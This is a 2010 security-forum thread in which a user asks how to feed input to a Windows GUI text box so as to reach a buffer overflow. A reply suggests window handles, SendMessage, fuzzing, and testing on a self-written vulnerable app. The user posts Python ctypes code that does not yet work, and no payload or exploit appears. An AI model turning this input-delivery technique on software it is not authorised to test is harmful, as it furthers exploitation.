• RSS
  • Twitter
  • FaceBook

Security Forums

Log in

FAQ | Search | Usergroups | Profile | Register | RSS | Posting Guidelines | Recent Posts

question on exploit writing.

Users browsing this topic:0 Security Fans, 0 Stealth Security Fans
Registered Security Fans: None
Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Exploits // System Weaknesses

View previous topic :: View next topic  
Author Message
jake2891
Just Arrived
Just Arrived


Joined: 20 Mar 2010
Posts: 0


Offline

PostPosted: Sat Mar 20, 2010 7:11 pm    Post subject: question on exploit writing. Reply with quote

I just want to know if there is an input box in a windows application or any application that has buffer overflow vulnrability but the function that needs to be called to exploit this is not accessible by passing commands to it via a command line like so "echo aaa |buffer.exe" how would someone get this function to execute with there input in a script like python would i have to open the application and then call that specific function? if so how cpuld that be done if the function was called foofunction any programming language example would be great or a link to a tutorial if anyone knows of one.

thanks
Back to top
View user's profile Send private message
Fire Ant
Trusted SF Member
Trusted SF Member


Joined: 27 Jun 2008
Posts: 3
Location: London

Offline

PostPosted: Sat Mar 20, 2010 9:31 pm    Post subject: Reply with quote

Assuming a Windows GUI application that has the following:

1 - Text box for input data
2 - "Execute" function which handles text box data in a non-secure manner e.g. Buffer Overflow

You could used the Windows APIs to send the appropriate string to the text box. To do this you need to know several things:

1 - The Windows Handle of the text box object
2 - Use the SendMessage/PostMessage API to write the text in the box
3 - Execute the function e.g. Send mouse click to "Execute" button

voila!

Now, you will need a suitable data set to test with so I suggest using a Fuzzer. Have a look at www.peachfuzzer.com , you can Fuzz Windows apps with this, you should be able to script lots of stuff.

This is of course all relying on a truly exploitable app. I suggest writing your own to test it.

Matt_s
Back to top
View user's profile Send private message
jake2891
Just Arrived
Just Arrived


Joined: 20 Mar 2010
Posts: 0


Offline

PostPosted: Tue Mar 23, 2010 10:54 pm    Post subject: Reply with quote

been trying to implement the steps you suggested this is what i have got so far. But using SetDlgItemTextA to set the text but having difficulty using python to set the text. loaded up the executable in ida pro not to sure on how to use the windows handle of the textbox. here is my code so far. the code opens up the process and tries to write to the inputbox. any input guys? thanks

python example.py PID

Code:

import os,sys,subprocess,time
from subprocess import *
from os import *
from ctypes import *
from ctypes.wintypes import *

PROCESS_ALL_ACCESS =     ( 0x000F0000 | 0x00100000 | 0xFFF )
kernel32 = windll.kernel32
pid      = sys.argv[1]

h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) )

if not h_process:
    print "[*] Couldn't acquire a handle to PID: %s" % pid
    sys.exit(0)

user32 = windll.user32

windll.user32.SetDlgItemTextA("hwnd handle of textbox not sure how to get this??",1,"test") this is the line im stuck on

Back to top
View user's profile Send private message
jake2891
Just Arrived
Just Arrived


Joined: 20 Mar 2010
Posts: 0


Offline

PostPosted: Wed Mar 24, 2010 8:44 am    Post subject: Reply with quote

ok ive manged to get the windows handler but for some reason its still not setting my text into the input box. ive asked on python forums but no one seems to have an answer. code below.

Code:


import os,sys,subprocess,time
from subprocess import *
from os import *
from ctypes import *
from ctypes.wintypes import *

PROCESS_ALL_ACCESS =     ( 0x000F0000 | 0x00100000 | 0xFFF )
kernel32 = windll.kernel32
pid      = sys.argv[1]

h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) )

if not h_process:
    print "[*] Couldn't acquire a handle to PID: %s" % pid
    sys.exit(0)

user32 = windll.user32
# parent window
window_handle = windll.user32.FindWindowA("WindowsApp", None)


if not window_handle:
    print "[*] cant find window"

# 1 is the control id of the child window
windll.user32.SetDlgItemTextA(window_handle, 1, "bla")

Back to top
View user's profile Send private message
Display posts from previous:   

Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Exploits // System Weaknesses All times are GMT + 2 Hours
Page 1 of 1


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

Community Area

Log in | Register